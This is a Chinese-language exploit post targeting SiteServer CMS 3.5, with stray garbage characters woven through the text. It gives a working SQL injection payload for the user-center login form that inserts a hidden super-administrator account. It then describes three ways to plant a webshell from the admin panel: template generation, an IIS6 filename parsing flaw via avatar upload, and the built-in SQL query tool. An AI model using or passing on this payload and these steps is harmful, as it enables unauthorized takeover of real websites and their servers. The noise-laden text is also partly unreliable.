经测试秒杀最新的3.5版6 D( P. t( \1 w- Y# x! r
) O& |1 G/ j/ v) T" z7 |
stieserver官网:www.siteserver.cn
# q7 Q2 `+ s# {1 ]% [" B0 r' l1 B* d. e
8 l7 B9 v! y8 \/ _; ?
) K, m& N5 U5 N0 XEXP:" W' e, F/ Z2 H# F' l7 [+ c" b
( C% r [* M8 O# w直接访问UserCenter/login.aspx" X0 m ]( |# a/ J% @- b
1 E, _, M8 `+ ?0 |8 Y- t$ t
! p' I( h0 z( _+ ~" _0 m4 }# i8 @
! U( i. n4 j/ P" \1 s3 v0 x' M; H用户名处输入:3 ]( c$ @/ g8 v3 U
$ n( a, _7 o% s6 T1 j123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--1 Z4 _% Q2 r+ ]9 ~2 h; [
! O% G8 E: A9 Z( W5 m8 {
0 y- D! J, \" ]: R
! S1 b6 N. e( b* {密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
$ y/ G3 }7 F! T
" }) v( l6 e9 S: O 5 E+ M0 p- B+ F2 y$ X/ J* k
- v2 K/ G! u1 P' V B! S6 i之后再访问后台SiteServer/login.aspx用插入的用户登陆
: r, Y+ @( Y: v
: F/ p% J: y2 t l& F3 S2 y , g5 l& o0 }: D, j
9 }& P% l) a& N7 v* [5 \后台拿webshell的三种方法:
1 [7 W- P& V* r' p$ \$ o5 R# l1 _
1 A" i5 M( `. x# J1 y一、 m" h! H( R% ^% t' C, }, w4 p0 f
1 ~9 M# x& b. Y* n5 Y$ p- A站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx8 u) O$ X- p( e W6 f9 f
8 w! M) U# X2 y$ v
二、
/ d0 B5 n+ k* k {" l9 ~
" I* B& u& Q( | O3 p成员权限-》添加用户-》用户名为:1.asp H. I8 w& Y4 @2 H
! A) F9 _7 M I& @8 ]
http://127.0.0.1/usercenter/! r2 x3 p8 p7 X( w2 f
Y2 L: E% @1 H4 I! l6 g用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell2 x5 j* E8 `; c0 i+ ?) U
q( }3 j5 @9 j8 N1 o$ x) `4 O! H
(ps:后台添加用户时不会验证是否含有非法字符)
% o. j' r9 [" R$ j, H& T
0 a' r/ b* x8 @, U9 k三、
% u# b# S; E4 k/ N; ]
; f2 i { k0 G3 d9 f" _系统工具-》实用工具-》机器参数查看& I) I! G' r t3 m: q* l7 Y6 L0 B
可以看到数据库类型、名称,WEB路径2 A+ I4 _5 ?+ h# h
% s& }4 x% g* J& g! A
系统工具-》数据库工具-》SQL语句查询
! {# L$ d5 T" c0 ^3 ~' |这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
+ ?+ Y7 s9 X: F) W% C. m: l N. C
|